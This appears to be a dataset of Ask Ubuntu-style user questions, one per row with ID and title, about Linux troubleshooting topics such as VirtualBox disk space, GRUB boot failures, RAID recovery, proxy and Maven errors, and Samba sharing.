425475	virtualbox ubuntu 12.04.01 ran out of space and will not reboot	i was using my ubuntu 12.04.1 virtualbox yesterday , and while installing some software , it gave me a warning about low disk space . i shut the laptop down and this morning the virtual machine will not reboot . it starts by complaining about low-resolution graphics and gives me the option of reconfiguring them . the machine is i believe reached the maximum disk space i allocated for it , which is why it 's not able to reboot : the machine stays like this when i choose `` run in low-res mode '' : this is what storage tells me about the status of the machine : virtualbox itself is working on my windows 7 laptop at work ( not my choice unfortunately ) , so i closed virtualbox and tried to resize the machine with this command : the resize was successful and i tried to reboot the machine again after it , but the same low-graphics mode menu appears . any ideas how to solve this issue ?
425476	nutch , solr and ubuntu server 12.04lts	i use ubuntu server 12.04lts and i would know what version of nutch and solr can be compatible with it . any solution please ?
425478	video and audio files change file type when transfering from ubuntu to windows 7 partition	i am trying to transfer audio and video files across from ubuntu 13:10 to windows 7 partition on virtual box . weather i put my files in the shared hard drive or on a usb when windows accesses it it does not recognise the file type . i have tried mp3 mp4 and avi anybody have any ideas on this please ? ! ! 1 [ windows on the left showing just a file and ubuntu on the right showing mp3 ] 3
425480	system runs unusably slow	everything was running fine , until i installed a chromium update , then it became unusably slow , like moving the mouse did n't even do anything on-screen , keyboard did n't really react either ... the fan was spinning ludicrously fast too ... i forced the computer to shut down by holding the power button , and when i rebooted it took longer to start up , everything seemed to run fine until i tried running chromium again , and then the system went back to being unusable . closing the program does n't help either , the system just hangs . i tried rebooting again the same way , and this time the system just started up even slower than before ... also , the hard drive seems to be busy constantly reading or writing , despite me not actually doing anything on it ... i 'm using ubuntu 13.10 on a late 2011 macbook pro , and i 've never had any issues with it until now ... so does anyone have any idea what could be wrong ? and what do you think the solution could be ?
425483	working with different size and type hard drive in hp proliant ml330 g6 & ubuntu server 12.04 lts	i was given a hp proliant ml330 g6 with two seagate barracuda 250 gb 7200 rpm sata drives . there are 4 bay slots on the machine and i 've got several other drives i 'd like to be able to install on the machine to store media ( photos/movies/videos/music ) to be accessed from other devices . the extra drives are of different sizes and different type , like the following ; seagate pipeline hd st3500321cs 500gb 8mb cache sata 3.0gb/s 3.5 '' internal hard drive bare drive western digital caviar green 750gb 7200rpm sata 3gbps 16mb cache 3.5-inch internal hard drive mfr p/n wd7500aacs-00d6b0 seagate barracuda 7200.12 st31000528as 1tb 7200 rpm 32mb cache sata 3.0gb/s 3.5 '' internal hard drive bare drive the problem is i do n't know how to set-up the machine to accommodate drives in all 4 bays . at the moment i have ubuntu server 12.04 lts installed but when i add in another drive it is unassigned and i do n't know how i should assign it so i take best advantage of the drive size . i do n't mind having to reinstall ubuntu as i 've put no files on it yet . thanks
425484	unable to use wget command	i am using ubuntu 13.10 with proxy servers with user id and password . i am unable to run wget command . showing resolving sourceforge.net ( sourceforge.net ) ... failed : name or service not known . wget : unable to resolve host address âsourceforge.netâ what can be done to resolve this ?
425488	apptitude - have i removed my entire system ?	i was trying to remove an unused package via aptitude interface but i seem to have removed my entire system ? luckily my personal data is backed up . aptitude ran for about 10 minutes or so listing everything it was removing , then the screen went black and has been like that for about 30 mins now ? i do not know what i did but definitely does not look good ... any ideas ? thanks running : xubuntu 13.10 64-bit
425492	unable to build mvn package for dspace	i am using ubuntu 13.10 and trying to install dspace latest version using proxy server with userid and password . i have followed the below link & successfully installed sun java and maven2 , tomcat7 and others pre-requisite s/w also . http : //ftanada.wordpress.com/2011/04/07/install-dspace-in-debian-6-0-squeeze/ when i am building the maven package for dspace getting following error as i have modified /etc/maven2/settings.xml proxy for maven . the screen shot for build error is given below with regards , vijay optional true http vijay abc 123.123.123.123 8080 localhost root @ vijay : ~ # mvn package [ info ] scanning for projects ... [ info ] -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- [ info ] building maven default project [ info ] task-segment : [ package ] [ info ] -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- downloading : http : //repo1.maven.org/maven2/org/apache/maven/plugins/maven-resources-plugin/2.3/maven-resources-plugin-2.3.pom [ warning ] unable to get resource 'org.apache.maven.plugins : maven-resources-plugin : pom:2.3 ' from repository central ( http : //repo1.maven.org/maven2 ) : error transferring file : repo1.maven.org downloading : http : //repo1.maven.org/maven2/org/apache/maven/plugins/maven-resources-plugin/2.3/maven-resources-plugin-2.3.pom [ warning ] unable to get resource 'org.apache.maven.plugins : maven-resources-plugin : pom:2.3 ' from repository central ( http : //repo1.maven.org/maven2 ) : error transferring file : repo1.maven.org [ info ] -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- [ error ] build error [ info ] -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- [ info ] error building pom ( may not be this project 's pom ) . project id : org.apache.maven.plugins : maven-resources-plugin reason : pom 'org.apache.maven.plugins : maven-resources-plugin ' not found in repository : unable to download the artifact from any repository org.apache.maven.plugins : maven-resources-plugin : pom:2.3 from the specified remote repositories : central ( http : //repo1.maven.org/maven2 ) for project org.apache.maven.plugins : maven-resources-plugin [ info ] -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- [ info ] for more information , run maven with the -e switch [ info ] -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- [ info ] total time : < 1 second [ info ] finished at : mon feb 24 16:03:52 ist 2014 [ info ] final memory : 1m/15m [ info ] -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- --
425493	sound issues- tuxguitar not working	current setup : ppc g5 , ubuntu studio 12.04 , focusrite sapphire soundcard through usb . working fine through qjackctl : audacious midi , audiocity ( recording and playback ) , ardour no sound : rosegarden , tuxguitar , timidity i suspect this is a midi issue . my objective here is to get tuxguitar to work , i just used rosegarden to find a pattern . my current output in tuxguitar : realtime sequencer / gervill ; ( already tried the others , they do n't work either ) regarding tuxguitar plugins , the only one i see related to midi is `` fluidsynth settings '' where the soundfont points is fluidr3_gm.sf2 , audio driver is alsa , 16bits , 64 , 16 . java is 1.6 . the java souns api plugin is activated , and configured to `` use default soundbank '' . when i check audacious , output plugin is jack , and the amidi-plug preferences show 2 backends available , alsa and fluidsynth , with oundfonts= fluidr3_gs and _gm .
425494	teamviewer not starting from command-line when using -- passwd switch	tested on ubuntu 12.04 with teamviewer v9.0.24147 ( .deb package , 32 bits ) . before starting the process : $ ps -e | grep `` teamviewer '' -i 2936 ? 00:00:00 teamviewerd if i then do : $ sudo teamviewer everything goes ok : init ... checking setup ... launching teamviewer ... the program window opens and i can connect remotely . if i do : $ sudo teamviewer -- passwd the program seems to start : ok initctl start teamviewerd teamviewerd start/running , process 3328 but it does not open any window and i can not connect remotely . and then : $ ps -e | grep `` teamviewer '' -i 3328 ? 00:00:00 teamviewerd what is going on here ? is not supposed teamviewer to open with my specified password ? i have tested all this on kali , and i get : $ sudo teamviewer -- passwd 12345678 unknown response /etc/init.d/teamviewerd start starting teamviewerd ... method return sender=org.freedesktop.dbus - > dest=:1.91 reply_serial=2 uint32 2 but the results are the same .
425495	how to install ubuntu by erasing red hat ?	i am a newbie here and i am trying to install ubuntu 12.04.4 desktop on my college machine which already has dual boot of red hat and windows 7 . i want to erase both the existing os and install just ubuntu . i am installing it from a dvd that i burnt from the iso image obtained from ubuntu official site after the 700 mb download . i am using an usb dvd drive and after pressing f12 i am selecting usb-cdrom for booting . but still the red hat version is starting and i ca n't install ubuntu . i checked on the other laptop and the disk is burnt correctly as well as the drive is working fine . do n't know whats the problem .
425497	can not install ubuntu ! ! no install ubuntu alongside option !	i wan na install ubuntu 13.10 alongside y windows 7 and windows 8.1 when i boot up from the live cd , it dosent give me an option to install ubuntu alongside windows.. i tried clicking on something else too ... . it just shows my whole disk as one unallocated partition ... i dont think i have 4 primary partitions too ... .. i once converted them to logical partitions too ! ! plz help , i really wan na install ubuntu ! !
425501	unable to locate package conky-manager	i want to install conky manager , i use 3 command to install it , sudo apt-add-repository -y ppa : teejee2008/ppa sudo apt-get update sudo apt-get install conky-manager for the first command , ouput is : gpg : keyring `/tmp/tmpfvhu7b/secring.gpg ' created gpg : keyring `/tmp/tmpfvhu7b/pubring.gpg ' created gpg : requesting key 2d0f61f0 from hkp server keyserver.ubuntu.com gpg : /tmp/tmpfvhu7b/trustdb.gpg : trustdb created gpg : key 2d0f61f0 : public key `` launchpad ppa for tony george '' imported gpg : total number processed : 1 gpg : imported : 1 ( rsa : 1 ) ok and for the second command , output is : w : failed to fetch http : //ppa.launchpad.net/teejee2008/ppa/ubuntu/dists/nadia/main/source/sources 404 not found w : failed to fetch http : //ppa.launchpad.net/teejee2008/ppa/ubuntu/dists/nadia/main/binary-amd64/packages 404 not found w : failed to fetch http : //ppa.launchpad.net/teejee2008/ppa/ubuntu/dists/nadia/main/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead . and for the thirdone output is : reading package lists ... done building dependency tree reading state information ... done e : unable to locate package conky-manager what is the problem ? is there another way to install conky manager ?
425502	how do i continue configuration if apt-get was interrupted ?	in case there were some problems during the last at-get operation , is there a command that checks if something has to be continued in apt-get ?
425508	bumblebee and nvidia 740m issues ubuntu 13.10	i used this link to install bumblebee on my system . i have an asus x550lb that uses the intel haswell chip for graphics ( i think its 4400 ) and nvidia 740m . after installing as it says ( no virtualgl ) and trying to run optirun < app > it said that it could n't recognise my secondary gpu . also nvidia-settings gives me the following error dialog you do not appear to be using the nvidia x driver . please edit your x configuration file ( just run `nvidia-xconfig` as root ) , and restart the x server . i then came upon this post . i installed 319-update as it says corrected the entries in the bumblebee.conf file , and optirun started . but e.g in secondlife ( the 3d virtual world game ) i get a frame rate at about 1.9 - 2.8 per second . when i try to run optirun nvidia-settings i still get the same error about nvidia drivers not beeing installed . how can i tell my nvidia gpu is at least recognised . also without bumblebee in the same game ( secondlife ) i get about 16fps while when running it without optirun but with optirun installed i get about 3.8fps . i guess they are conflicting . any good advices ? these nvidia packages are installed in my system right now dpkg -l | grep -i nvidia ii bbswitch-dkms 0.7-2 amd64 interface for toggling the power on nvidia optimus video cards ii nvidia-304 304.88-0ubuntu8 amd64 nvidia binary xorg driver , kernel module and vdpau library ii nvidia-current 304.88-0ubuntu8 amd64 transitional package for nvidia-current ii nvidia-settings-304 304.88-0ubuntu2 amd64 tool for configuring the nvidia graphics driver
425510	mysql password reset but dont stop mysqld	i have a server with mysql database installed longtime ago . i forgot the password but this db is associated with many services which i can not stop . if i stop mysql to reset its root password i may lost connectivity which absolutely dont want . is there any way i can reset mysql password with out stopping it ? bottom-line : reset mysql root password but dont stop mysql service .
425514	ubuntu 13.10 does not boot after succesful installation : 'all boot options are tried '	i am new to ubuntu and linux , i hope someone could help me ... i installed ubuntu 13.10 64-bit on my new samsung ativ ( 4 gb memory / quad core 1.4 ghz processor / amd radeon hd8250 graphic card / 128 g ssd ) . first time all went well , except of the graphics , i got into low graphics mode , but could fix it with installing fglrx . after an update something went wrong , i could n't log in anymore and could only work with a guest account . after trying to fix that , i decieded to reinstall ubuntu . this wo n't work , as after installation and rebooting all i see is `` all boot options are tried , press f4 for recovery mode '' . pressing f4 would n't change anything . if i reinstall , i see that ubuntu is installed and am asked if i want to reinstall , install alongside 13.10 or erase and install . after installing , the whole thing repeats , all boot options are tried after rebooting . pressing 'shift ' while booting wo n't help . what went wrong ? thanks ! ! !
425515	how setup samba share only readable by a certain domain group ?	i 'm using ubuntu server 12.04 connected to an active directory by likewise open . i want to be able to share my files with others in the same domain group . i 've followed this guide and also uncommented the [ homes ] section in smb.conf file and created a new share with read permission for group members . i have only managed to share files when allowing guests , otherwise i only get an authentication pop-up , that is unable to actually authenticate with my credentials ( my domain user , used to login on both windows and ubuntu ) . i 've googled around and found lots of confusing information that either does n't apply to likewise open or simply does n't work . surely i do n't need to setup samba as a domain controller to do this ? i just want to setup an ubuntu file server in a windows domain . i can see the shares but when i double click i get a popup asking for user , domain and password , but none is accepted . i 've tried to map the domain group to a linux group but that did n't work either . please help .
425516	aptitude problem using mariadb repository on ubuntu 13.10	i installed mariadb 5.5 on my ubuntu laptop like described here : sudo add-apt-repository `` deb http : //ftp.osuosl.org/pub/mariadb/repo/5.5/ubuntu $ ( lsb_release -c -s ) main '' and it works fine so far , only there is something odd with aptitude : when i enter sudo su lang=c aptitude install i get these warnings : the following new packages will be installed : linux-headers-3.11.0-12 linux-headers-3.11.0-12-generic mysql-client-core-5.5 { b } mysql-server-core-5.5 { b } 0 packages upgraded , 4 newly installed , 0 to remove and 2 not upgraded . need to get 13.7 mb/21.4 mb of archives . after unpacking 100 mb will be used . the following packages have unmet dependencies : mariadb-server-core-5.5 : conflicts : mysql-server-core-5.5 but 5.5.35-0ubuntu0.13.10.2 is to be installed . mysql-client-core-5.5 : breaks : mysql-client-core-5.1 which is a virtual package . mysql-server-core-5.5 : breaks : mysql-server-core-5.1 which is a virtual package . mariadb-client-core-5.5 : conflicts : mysql-client-core-5.5 but 5.5.35-0ubuntu0.13.10.2 is to be installed . the following actions will resolve these dependencies : keep the following packages at their current version : 1 ) mysql-client-core-5.5 [ not installed ] 2 ) mysql-server-core-5.5 [ not installed ] accept this solution ? [ y/n/q/ ? ] i am confused and press q for quit ! this warning started after some days of usage of my pc using aptitude to keep it updated . aptitude uses the mariadb repository now . this is my /etc/apt/sources.list : # begin sources.list deb http : //de.archive.ubuntu.com/ubuntu/ saucy main restricted deb-src http : //de.archive.ubuntu.com/ubuntu/ saucy main restricted ... deb http : //ftp.osuosl.org/pub/mariadb/repo/5.5/ubuntu saucy main # deb-src http : //ftp.osuosl.org/pub/mariadb/repo/5.5/ubuntu saucy main # end sources.list why does it want to install an older kernel and do such things ? i am already on uname -a linux myserver 3.11.0-17-generic # 31-ubuntu smp mon feb 3 21:53:31 utc 2014 i686 i686 i686 gnu/linux
425517	can not change ui language in firefox	i got installed ubuntu with preinstalled firefox . i 'd like to have firefox with english ui language . however , i got a firefox with russian ui . system language in my ubuntu is english . i tried reinstall firefox ( from ubuntu software center and via apt-get install firefox ) . i tried apt-get install firefox-locale-en and set general.useragent.locale form ru to en-us . however , always i receive firefox in russian . i know i can download *.tar.bz2 from http : //www.mozilla.org/en-us/firefox/new/ however , i 'd like to know how to persuade ubuntu software center to install english version of firefox ( or via apt-get install firefox ) ?
425518	recover files from a broken virtualbox machine .vdi	my ubuntu 12.04.1 running on virtualbox ran out of space while i was installing software on it and now it is not rebooting . i 've got files i need to recover from it . i have the ubuntu64.vdi file on my windows 7 ( host ) laptop and i was wondering if there is any way of recovering the files from the vdi file . in parallel , i generated a fresh 12.04.1 machine on virtualbox in the same laptop , and i 'll use that one instead of the borked one . i can add the borked vdi to the list of disks in the working one . then i used gnome nautilus to mount the borked disk . i can find the files in there , but they are about 2 months old . i think this coincides with the last time that i did a virtualbox snapshot of the machine , but not the last time i got a working machine , which was yesterday . is there any way of mounting the vdi as of yesterday , just before it crashed ? edited : here is what virtual media manager tells me about my ubuntu64.vdi file : edited2 : i copied my ubuntu.vdi to an external usb with plenty of disk space . i tried using windows to clone it , but got an error : i tried the same from the working vm via a shared folder of the usb drive , and it started the cloning . took a good while , but finished successfully : root @ precise64 : /media/sf_e_drive/copy_of_ubuntu64_vm_folder_20140224/ubuntu64 # vboxmanage clonehd ubuntu64.vdi ubuntu64.raw -- format raw 0 % ... 10 % ... 20 % ... 30 % ... 40 % ... 50 % ... 60 % ... 70 % ... 80 % ... 90 % ... 100 % clone hard disk created in format 'raw ' . uuid : 90f99198-18e1-40ee-85fe-c083dcbb1ac3 edited3 : after creating the raw file , i run testdisk with deeper search , i get a list like this : ater deeper search has finished , i get a list like this : but i do n't know which one is which snapshot ... any ideas ?
425524	ubuntu installation of 64-bit on 32-bit os	i have confusion of installing ubuntu 12.04 ! . actually my system is 32-bit with 4gb ram . in the official page of ubuntu its given as 32-bit ( for machine less than than 2gb ram ) . can anyone please help me , thank & regards suhas
425527	minimized apps not showing on cairo dock	how do i have cairo dock show minimized applications , like docky does ? docky shows `` dot '' when application opened or minimized .
425528	.htaccess apache mode rewrite not working	new to ubuntu and trying to set-up php environment . now most of the things are set but .htaccess file not working at all for my cms . i have two sites /var/www/one/ and /var/www/two/ now when i hit http : //localhost/ it is showing me two directories . now when i tried to set .htacces to rewrite the url it is giving me page not found error . i have tried many things but nothing work . eventually i found this http : //askubuntu.com/a/48363/249945 and when i tried it is giving me internal server error for the site one which has .htaccess file . please help me to make it work.. million.. trillion thanks ... : ) forgot to mention when i try to use above answer solution it is hiding my one directory if i access http : //localhost/ and showing only directory two
425530	locate mouse helper in xubuntu for visually impaired	i ca n't find a locate pointer feature ( anymore ) in xubuntu . is there an xubuntu 13.10 ( xfce ) alternative for the show mouse accessibility ccsm plugin for ubuntu ? my mother is slightly visually impaired and has difficulties finding the mouse . her computer is to old/weak to run ubuntu/unity . update still not present in 14.04 , but i noticed the feature exists in default debian : show position of pointer when the control key is pressed as i recall correctly it existed in xubuntu in older versions too , why has this extremely valuable feature been dropped ?
425531	how to install windows xp guest in virtualbox with ubuntu 12.04 host	where in virtualbox do you install windows xp guest with ubuntu 12.04 lts as host .
425532	sudo : setresuid ( ) [ 0 , 0 , 0 ] - > [ 117 , -1 , -1 ] : operation not permitted	i am not able to login as super user . here 's the output of setresuid ( ) : sudo : setresuid ( ) [ 0 , 0 , 0 ] - > [ 117 , -1 , -1 ] : operation not permitted
425535	install ubuntu os on ssd and other files to hdd	i am building a new pc . i am planning on having both a sdd and hdd . i want to install the latest ubuntu release to , and have the pc boot from and run the os from , the ssd . i also want any files , such as pictures , music , docs , etc to automatically be written to and saved on the hdd . this will keep the ssd/os relatively `` clean '' and allow for the fastest possible boot . the forums here have a lot of posts about dual booting windows 7 and ubuntu , moving a system over to ssd , cloning from hdd to ssd , etc . i can not seem to find a post on this exact suject . if there is one , can somebody direct me to it . note that i am a noob when it comes to linux . i have studied and understand how to do such an install and disk ( s ) setups on w7 & w8 . thanks for any help .
425538	auto signed applet does n't run	i 'm under ubuntu and i have already installed icedtea . the applet i 'm trying to execute is auto signed . i know that there is a security config under icedtea to prevent such applet to be run . i 'm asking : where/how can i add an exception so that a website will be authorized to run his applet ?
425540	i am running 12.04 on usb would now like to install on c : will it overwrite windows xp	i am running 12.04 on a usb stick on a machine with windows xp and would now like to install 12.04 on my c : drive using the windows installe . will it run alongside my existing system ?
425542	twitter client for ubuntu 12.04	i 'm looking for a twitter client for my ubuntu 12.04 desktop . i know there is a way to run one in chrome , but i want it as a seperate program . so far i have tested the following : hotot : wo n't let me sign in choqok : signs in but does nothing polly : crashes on startup gwibber : gives a blank screen turpial : gives an authentication error some extra software i have tried : tweetdeck in wine : installs but gives white screen back pino : wo n't let me login and gives following error message : 403 forbidden : the server understood the request , but is refusing to fulfill it is there really no twitter client that works on ubuntu 12.04 ?
425543	problem with hardware installation	i am a new user of ubuntu 12.04 lts and is very disappointed with this operation system regarding installation of hardware like my brother dcp- j125 printer , flat bed scanner etc . i think linux is not user friendly as a windows operating system.the latter os is much easier to install hardware . please can you give me guidance in this regard because i am very frustrating.i do n't know what i am doing wrong .
425545	usb to serial problem	i installed usb to serial on ubuntu 12.10 to be able to connect to the console port of my switch and router . after the installation it worked properly . but the issue i have is that my system for no reason does not detect the usb when connected , after i use the command lsusd . but after some time it detects it . i do not know why it does that and am wondering if it is the usb cable or the port of my system .
425549	dual screen issues with dell xps 13 running ubuntu 12.04 lts x64	my laptop works fine with the exception of one small problem . i have a 27 inch dell flat screen . sometime when i log in , the screen will be outside the normal setting - the icons on the left of my screen ( launcher ) will only show about half the icon . the rest of the icon is off the screen to the left . i fix this by opening and closing my laptop lid . all the icons then show up fine after that . what is the cause of this and how can i fix it ? this is a brand new xps 13 .
425550	if i set ctrl+shift shortcut for change a language i ca n't use ctrl+shift+key	i updated to ubuntu 13.10 . i set a shortcut ctrl+shift to change a keyboard layout . after that ctrl+shift+ [ key ] does n't work because it just change a layout . there is n't such problem on 13.04 . can anybody help ? thanks in advance .
425558	connecting to lan with specific ip	i am totally a newbie to ubuntu . i am trying to connect to lan . here is the screenshot of what i do in windows to connect to that network : but in ubuntu while editing connection with specific ip address i ca n't save it and continue . need some help here . thanks in advance .
425559	online audio troubles in firefox	i tried to hear some online radio , but have en error message in firefox . totem-plugin-viewer requires to install plugins to play media files of the following type : mpeg-1 layer 3 ( mp3 ) decoder meanwhile google chrome plays same radio . how can i make firefox play online radio ?
425560	can i change user account database graphically in ubuntu ?	is it possible to modify user account database graphically in ubuntu as centos . any help because i think it could save time ?
425566	computer fails to wake up after hibernate	i recently fresh-installed ubuntu 13.10 on my toshiba satellite l455 after several unsuccessful attempts at upgrading from a previous version . after resolving several minor glitches i find myself unable to resolve this very annoying occurrence : having to completely shut down and rebooting my computer every time it goes into hibernation , whether from inactivity , or after closing the lid and opening it back up -- like i used to do . in looking at other forum questions , someone suggested finding out some additional information in order to better address the issue , so i went ahead and obtained it , in case this may expedite attempts to resolve the question . so i ran sudo lshw -c network and obtained the following result : *-network description : ethernet interface product : rtl8101e/rtl8102e pci express fast ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:0e:00.0 logical name : eth0 version : 02 serial : 00:26:22:47:7d:1c size : 10mbit/s capacity : 100mbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list rom ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=half latency=0 link=no multicast=yes port=mii speed=10mbit/s resources : irq:44 ioport:3000 ( size=256 ) memory : f2010000-f2010fff memory : f2000000-f200ffff memory : f2020000-f203ffff *-network description : wireless interface physical id : 2 bus info : usb @ 1:2 logical name : wlan0 serial : 70:1a:04:70:9b:92 capabilities : ethernet physical wireless configuration : broadcast=yes driver=rtl8187 driverversion=3.11.0-18-generic firmware=n/a ip=192.168.1.69 link=yes multicast=yes wireless=ieee 802.11bg monica @ monica-satellite-l455 : ~ $ i 'm also running gnome classic . but it happens in any of the desktop environments available . any help would be appreciated .
425568	installing ubuntu under windows on windows 8	is it possible to dual boot ubuntu 12.04.3 and windows 8 , both 64bit ?
425569	sorry , there was a problem mounting the file	i 've just bought a new laptop . it comes pre-installed with windows , which i do n't want to use . i confirmed with the shop staff before buying it that it would work with ubuntu . i 've repeatedly downloaded ubuntu from this site , but every time it tells me that the download has completed , i click on the file in the downloads folder and an error message comes up : sorry , there was a problem mounting the file took it back to the shop , they said since it was ex-display i needed to install alot of updates and that once i 'd done that , all would be well . i 've done those updates , and just reinstalled ubuntu , but the problem is still there .
425571	dual kubuntu 13.10 for ssd+hdd configuration with same /boot/ partition - how to do it ?	i 'd installed ssd to my desktop and copyed existing kubuntu 13.10 from hdd to it ( fixed /etc/fstab and so after copying ) . because some bios & ahci related issues i 'm need to disable ssd in bios and boot grub2 and kernel from hdd with rootfs on ssd . so there is 3 questions : i 'm want to keep existing hdd installation of kubuntu 13.10 as fallback in case of ssd failure , so how should i set up grub2 and /boot/ to create 2 menu items with same kernel but different root= settings ( one main , for root=ssd and one aux , for root=hdd ) ? how to set up apt-get to do n't remove kernel needed by hdd installation of kubuntu ? i 'm want to keep swap partition on hdd but use ssd for hibernate/restore . how should i set tuxonice for this configuration ? thank you .
425572	how can i fix these errors after extracting linux 3.10.10 package on vmware ?	after extracting linux 3.10.10 package on vmware 32 bit ( ubuntu 12,0.4 32 bit ) , i got the following error : root : /sources/linux-3.10.10 # make & & make modules_install hostld scripts/kconfig/conf scripts/kconfig/conf -- silentoldconfig kconfig syshdr arch/x86/syscalls/../include/generated/uapi/asm/unistd_32.h syshdr arch/x86/syscalls/../include/generated/uapi/asm/unistd_64.h syshdr arch/x86/syscalls/../include/generated/uapi/asm/unistd_x32.h systbl arch/x86/syscalls/../include/generated/asm/syscalls_32.h syshdr arch/x86/syscalls/../include/generated/asm/unistd_32_ia32.h syshdr arch/x86/syscalls/../include/generated/asm/unistd_64_x32.h systbl arch/x86/syscalls/../include/generated/asm/syscalls_64.h hostcc arch/x86/tools/relocs_32.o hostcc arch/x86/tools/relocs_64.o hostcc arch/x86/tools/relocs_common.o hostld arch/x86/tools/relocs wrap arch/x86/include/generated/asm/clkdev.h chk include/generated/uapi/linux/version.h upd include/generated/uapi/linux/version.h chk include/generated/utsrelease.h upd include/generated/utsrelease.h cc kernel/bounds.s > kernel/bounds.c:1:0 : error : code model 'kernel ' not supported in the 32 bit mode /* ^ kernel/bounds.c:1:0 : sorry , unimplemented : 64-bit mode not compiled in make [ 1 ] : *** [ kernel/bounds.s ] error 1 make : *** [ prepare0 ] error 2
425574	downloaded the apache open office progeam to my home/downloads folder	i have already installed apache openoffice 4.0.0 and would like to update it to the newer version which is apache openoffice 4.0.1 . i have already downloaded the _deb.tar.cz files that were required but i ca n't seem to access the download through the terminal service to install it . i am still learning linux but it seems to work really well for my needs . the version i have is ubuntu 12.04lts . what i tried was to open the home/ directory but it ca n't seem to find it using the command : cd /home/downloads/apache folder command . what did i do wrong . thanks in advance from joe joe_13642 @ yahoo.com
425577	hud-service is using 800 mb , is this necessary ?	hud-service in system monitor is currently using 800 mb of memory . is this normal ? what is it for ? is there a way i can reduce it ?
425583	ubuntu connect drops . worked for a while then started dropping again	it worked , the it dropped , then it worked , now it wo n't connect to wireless . brand new asus laptop that came with ubuntu is connected . the problem seems to be with ubuntu . it keeps asking for authorization codes for my neighbors signals as well as my signal which the asus is connected to .
425585	unity launcher is missing with cairo duck	i installed cairo on my ubuntu 12.4 . it works great , but when i change my desktop environment in login screen from unity 3d to cairo plus unity my desktop has no unity launcher . how can i fix it . only top panel and indicator are present . help
425587	grub rescue boot error ( already tried several methods of boot repair )	intermediate ubuntu user that has never really had an issue that googling could n't solve until now . initially installed 12.04 but had some unrelated os issues so i had ended up re-installing , every since that re-install i ca n't boot without getting the grub rescue ( hd0 ) error . i have tried ... utilizing different media boot devices , usb vs cd different versions 13.10 and 12.04 i was able to boot into 9.04 ( i had an extra copy laying around ) but it was a 32 bit , tried to then install 12.04 64 bit but no luck reformatted the drive ( via boot repair ) ran several passes of boot repair , automatic mode as well as advance options within boot repair such as `` purge grub '' ( followed the terminal commands ; this method allowed me to get past the bootloader error but never actually load the os ) . i also have tried to re-install grub manually through the live cd , via the terminal i realize that i need to re-install grub but i do n't understand the issue , what am i doing wrong ? i have followed just about every method for re-installing grub and still no joy here is my boot repair url http : //paste.debian.net/83722/ any help would be much appreciated . system info amd phenom iix6 1045t 3tb wd red 2x4gb ram ga-m68mt-s2p board ( my board does not have an uefi boot option )
425591	recovering a degraded raid array	i was just given an external hard drive by a colleague , with the comment `` hey , you 're running ubuntu . maybe you can recover some of the data from this really old disk that nobody knows who last used ? '' ( ok , that 's not really what he said , but that 's just about as much information i have at hand at the moment ... ) i plugged in the disk in my computer , and discovered it was raid1-configured . i 've never worked with raid-configurations before . after some googling and trying to figure out what to do to be able to read this disk , i 've gathered the following information : http : //pastebin.com/kzhaj7u9 what might be most interesting is the following excerpt : tlycken @ hoth ~ $ sudo mdadm -e /dev/sdb2 ... number major minor raiddevice state this 0 8 18 0 active sync /dev/sdb2 0 0 8 18 0 active sync /dev/sdb2 1 1 0 0 1 faulty removed there are two other partitions ( sdb3 and sdb5 ) that report similar tables , but they both report `` active sync '' for the state on all three rows . so this partition seems to be the troublesome one . if i open the disk utility gui , i see the following , after trying to start the raid array : when i pressed the little play button at the top right ( which is a stop button in this screenshot ) i get the following error message : error starting raid array error starting raid array : command-line `mdadm -- assemble -- scan -- uuid `` 866221ac : fd8d56af : aceaa1c2:25d2b442 '' ' exited with non-zero exit status 2 : mdadm : /dev/md2 has been started with 1 drive ( out of 2 ) . ( udisks-error-quark , 0 ) all i can understand from this is that it seems that part of the raid array is missing - however , i have no idea if the missing part is some partition on the disk i have in front of me ( i.e . something i could probably configure to make it work ) or on another physical disk ( which i have little or no hope of being able to get my hands on ) . how do i configure and mount this array so that i can read the data ( read-only is fine ) ?
425592	data extraction from a text file using bash	i am looking for a bash script . in a text file i have data like : + -- -- -- + -- -- -- | id | user | + -- -- -- + -- -- -- + | 8192 | root | | 8194 | root | | 8202 | root | | 8245 | root | | 8434 | root | | 8754 | root | | 8761 | root | | 8762 | root | | 8764 | root | | 8771 | root | + -- -- -- + -- -- -- + i want to extract the data as follow : 8192,8194,8202,8245,8434,8754,8761,8762,8764 i mean , i need first field containing numbers , but not the last one . and all the numbers extracted should be separated by comma ( , ) . could somebody help me to get it ?
425593	monitor sound output	when i listen to trance.fm the station stops periodically . but , if i refresh the browser , the music starts right up . ( i am thinking unbuffered streaming ) i am thinking about writing a program to over come this . in pseudo code my program would be : if audio stops , refresh browser ( or media player ) but i am not sure how to check the audio device for whether it is outputting sound or not . how can i check the speaker to make sure they are outputting audio ? is this functionality already present in a media player ?
